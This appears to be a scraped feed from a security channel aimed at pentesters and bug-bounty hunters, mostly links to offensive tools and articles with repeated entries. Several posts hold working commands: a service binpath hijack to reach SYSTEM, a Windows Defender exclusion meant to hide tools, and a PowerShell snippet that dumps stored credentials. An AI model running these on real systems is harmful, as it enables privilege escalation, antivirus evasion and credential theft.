#Java Deserialization: Misusing OJDBC for SSRF
https://agrrrdog.blogspot.com/2018/01/java-deserialization-misusing-ojdbc-for.html
#pentest
https://agrrrdog.blogspot.com/2018/01/java-deserialization-misusing-ojdbc-for.html
#pentest
Blogspot
Java Deserialization: Misusing OJDBC for SSRF
This year ZeroNights has got a new zone - Web Village. It was a special "track" for people who were interested in web security. The basic...
TIDoS Framework
The Offensive Web Application Penetration Testing Framework.
https://github.com/theInfectedDrake/TIDoS-Framework
#web
#pentest
The Offensive Web Application Penetration Testing Framework.
https://github.com/theInfectedDrake/TIDoS-Framework
#web
#pentest
DbgShell - A PowerShell Front-End For The Windows Debugger Engine http://bit.ly/2O7c30o #infosec #hacking #hackers #pentesting #pentest #programming #opensource #powershell #Windows
Forwarded from امنیت اطلاعات
Gerix WiFi Cracker 2018
https://github.com/kimocoder/gerix-wifi-cracker
#wifi
#network
#pentest
@sec_nerd
https://github.com/kimocoder/gerix-wifi-cracker
#wifi
#network
#pentest
@sec_nerd
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
Twitter
ap
CVE-2019-1322 as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
Add a file/folder to #Windows Defender exclusion list
C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"
useful if you want to move #pentest tools to a Windows machine without Defender interfering
Admin UAC prompt required
#powershell #oscp
C:\>powershell -exec bypass - "Add-MpPreference -ExclusionPath 'D:\EvilFolder\Tools'"
useful if you want to move #pentest tools to a Windows machine without Defender interfering
Admin UAC prompt required
#powershell #oscp
Best #firefox addons for #Hacking:
-HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer:
-HttpRequester
-RESTClient:
-Tampermonkey
-XSS Me
-SQL Inject Me
-iMacros
-FirePHP
#bugbountytips #bugbountytip #hacking #OSINT #pentest
-HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer:
-HttpRequester
-RESTClient:
-Tampermonkey
-XSS Me
-SQL Inject Me
-iMacros
-FirePHP
#bugbountytips #bugbountytip #hacking #OSINT #pentest
different 2FA bypasses:
evilginx:https://github.com/kgretzky/evilginx2
CredSniper:https://github.com/ustayready/CredSniper
ReelPhish:https://github.com/fireeye/ReelPhish
Modlishka:https://github.com/drk1wi/Modlishka
#pentest #hacking #phishing #redteam #bugbountytip
evilginx:https://github.com/kgretzky/evilginx2
CredSniper:https://github.com/ustayready/CredSniper
ReelPhish:https://github.com/fireeye/ReelPhish
Modlishka:https://github.com/drk1wi/Modlishka
#pentest #hacking #phishing #redteam #bugbountytip
GitHub
GitHub - kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session…
Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication - kgretzky/evilginx2
Hacking SQL Server Stored Procedures
1: (un)Trustworthy Databases
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
2: User Impersonation
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
3: SQL Injection
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
4: Enumerating Domain Accounts
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
#infosec #pentest #redteam
1: (un)Trustworthy Databases
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
2: User Impersonation
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
3: SQL Injection
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
4: Enumerating Domain Accounts
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
#infosec #pentest #redteam
NetSPI
Hacking SQL Server Stored Procedures – Part 1: (un)Trustworthy Databases
In this blog I’ll show how database users commonly created for web applications can be used to escalate privileges in SQL Server when database ownership is poorly configured.
CSV Injection: http://ghostlulz.com/csv-injection/
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
Ghostlulz
CSV Injection - Ghostlulz
How to use CSV injection AKA Formula injection to embed a malicous payload into to spread sheet.
Linux For Pentester:tmux Privilege Escalation.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20For%20Pentester:%20tmux%20Privilege%20Escalation.pdf
Linux for Pentester:Perl Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2/Linux%20for%20Pentester:%20Perl%20Privilege%20Escalation.pdf
Linux for Pentester:ed Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20for%20Pentester:%20ed%20Privilege%20Escalation.pdf
#Pentesting #RedTeam #hacking #PenTest
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20For%20Pentester:%20tmux%20Privilege%20Escalation.pdf
Linux for Pentester:Perl Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2/Linux%20for%20Pentester:%20Perl%20Privilege%20Escalation.pdf
Linux for Pentester:ed Privilege Escalation.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/8-part-100-article/62_article/new/Linux%20for%20Pentester:%20ed%20Privilege%20Escalation.pdf
#Pentesting #RedTeam #hacking #PenTest
GitHub
blaCCkHatHacEEkr/PENTESTING-BIBLE
This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .L...
5 Subdomain Takeover #ProTips.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/5%20Subdomain%20Takeover%20%23ProTips.pdf
Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2-part-100-article/Finding%20the%20Balance%20Between%20Speed%20&%20Accuracy%20During%20an%20Internet-wide%20Port%20Scanning.pdf
Phishing With a Rogue Wi-Fi Access Point.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/Phishing%20With%20a%20Rogue%20Wi-Fi%20Access%20Point.pdf
#bugbountytip #Hacking #OSINT #Pentest
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/5%20Subdomain%20Takeover%20%23ProTips.pdf
Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2-part-100-article/Finding%20the%20Balance%20Between%20Speed%20&%20Accuracy%20During%20an%20Internet-wide%20Port%20Scanning.pdf
Phishing With a Rogue Wi-Fi Access Point.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/Phishing%20With%20a%20Rogue%20Wi-Fi%20Access%20Point.pdf
#bugbountytip #Hacking #OSINT #Pentest
GitHub
blaCCkHatHacEEkr/PENTESTING-BIBLE
This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .L...
Dump local Creds
PS>
[void][http://Windows.Security.Credentials.PasswordVault,http://Windows.Security.Credentials,ContentType=WindowsRuntime]
$pw = New-Object http://Windows.Security.Credentials.PasswordVault
$pw.RetrieveAll() | % { $_.RetrievePassword();$_ }
#redteam #pentest
PS>
[void][http://Windows.Security.Credentials.PasswordVault,http://Windows.Security.Credentials,ContentType=WindowsRuntime]
$pw = New-Object http://Windows.Security.Credentials.PasswordVault
$pw.RetrieveAll() | % { $_.RetrievePassword();$_ }
#redteam #pentest
Grep hostnames from ssl certificate
echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS
#infosec #pentest #bugbounty
echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS
#infosec #pentest #bugbounty
#Pentest #bugbounty
https://github.com/k8gege/K8tools
https://github.com/mbechler/marshalsec
https://github.com/lanjelot/patator
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/evilcos/xssor2
https://github.com/cujanovic/SSRF-Testing
https://github.com/LandGrey/pydictor
https://github.com/m0rtem/CloudFail
https://github.com/1N3/Findsploit
https://github.com/rewardone/OSCPRepo
#bugbountytips
https://github.com/k8gege/K8tools
https://github.com/mbechler/marshalsec
https://github.com/lanjelot/patator
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/evilcos/xssor2
https://github.com/cujanovic/SSRF-Testing
https://github.com/LandGrey/pydictor
https://github.com/m0rtem/CloudFail
https://github.com/1N3/Findsploit
https://github.com/rewardone/OSCPRepo
#bugbountytips
GitHub
GitHub - k8gege/K8tools: K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/Ove…
K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetN...
#pentest
https://github.com/jivoi/pentest
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec
Red-Teaming-Toolkit
https://github.com/infosecn1nja/Red-Teaming-Toolkit
pwndb
https://github.com/davidtavarez/pwndb
pupy
https://github.com/n1nj4sec/pupy
Red-Team-Infrastructure-Wiki
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
Cheatsheet-God
https://github.com/OlivierLaflamme/Cheatsheet-God
#bugbountytips
https://github.com/jivoi/pentest
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec
Red-Teaming-Toolkit
https://github.com/infosecn1nja/Red-Teaming-Toolkit
pwndb
https://github.com/davidtavarez/pwndb
pupy
https://github.com/n1nj4sec/pupy
Red-Team-Infrastructure-Wiki
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki
Cheatsheet-God
https://github.com/OlivierLaflamme/Cheatsheet-God
#bugbountytips
GitHub
GitHub - jivoi/pentest: :no_entry: offsec batteries included
:no_entry: offsec batteries included. Contribute to jivoi/pentest development by creating an account on GitHub.